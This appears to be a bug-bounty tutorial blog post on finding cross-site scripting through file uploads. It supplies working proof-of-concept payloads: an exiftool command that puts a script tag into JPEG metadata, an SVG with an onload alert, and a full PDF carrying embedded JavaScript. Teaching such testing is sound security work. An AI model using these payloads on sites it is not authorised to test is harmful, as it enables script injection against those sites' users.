Hey guys, this is TheToySec, back again with another Post. In this post we will discuss about File uploading XSS and how can we find XSS by just uploading a file while doing bug bounty as well as penetration testing. So without further delay lets start.
So before talking about File upload XSS, lets understand What is XSS?
XSS is stands for cross site scripting, which is a client side injection vulnerability allows an attacker to put and execute malicious codes in a website from the client side. For more information you can refer to What is XSS and XSS Cheat Sheet.
File Upload XSS
exiftool hello.jpg
Type the following command for XSS using Exif tool :
exiftool -Artist='"><script>alert(1)</script>'hello.jpg
Lets confirm the the payload is embedded in the Meta Data or not by following command again:
exiftool hello.jpg
In this pic we can confirm the payload is successfully embedded. Well in my case I created a random image file named hello.jpg, you can create any name and embed any payload.
Find XSS by uploading SVG file
If the web application allows to uploading SVG file extension, which is also an image type, then we can simply try out to embed the XSS payload through SVG file.
Here’s how we can Make a SVG file and Embed the payload for XSS
Copy and paste the following code:
<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)"
Now save it as a SVG file extension e.g. XSS.svg and upload it in that web application where SVG file is allowed, If there is no proper sanitizations SVG files then hopefully you’ll get a XSS!
Find XSS by uploading PDF
If there is a feature to upload the PDF File, then we can simply try out to embed the XSS payload through PDF file.
Here’s how we can Make a PDF file and Embed the payload for XSS.
Copy and paste the following code:
%PDF-1.3
%
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA
<</O
<</JS
(
try {
app.alert\("Hacked by none"\)
} catch \(e\) {
app.alert\(e.message\);
}
)
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream
BT
/F1 24 Tf
ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer
<</Root 1 0 R /Size 5>>
startxref
493
%%EOF
Now save it as a PDF file extension e.g. poc-1.pdf and upload it in that web application where PDF file is allowed, If there is no proper sanitizations for PDF files then hopefully you’ll get a XSS!
Disclaimer: Hackerinthehouse, it’s author and it’s affiliates won’t be responsible for any actions made by you. If you’ll do anything illegal by the help of this article then you might be caught and at that time do not use the name ToySec, ha ha ha 😂😂, Just Kidding. This article is published for security research and education purposes only. It is the end user’s responsibility to obey all applicable local, state and federal laws.
If you really like this post then give your reaction and don’t forget to share with others. Till then we will meet again in another interesting topic.
Follow me here: https://www.linkedin.com/in/soumyaranjanpradhan/
Thank you for reading this article and have a nice stay there!
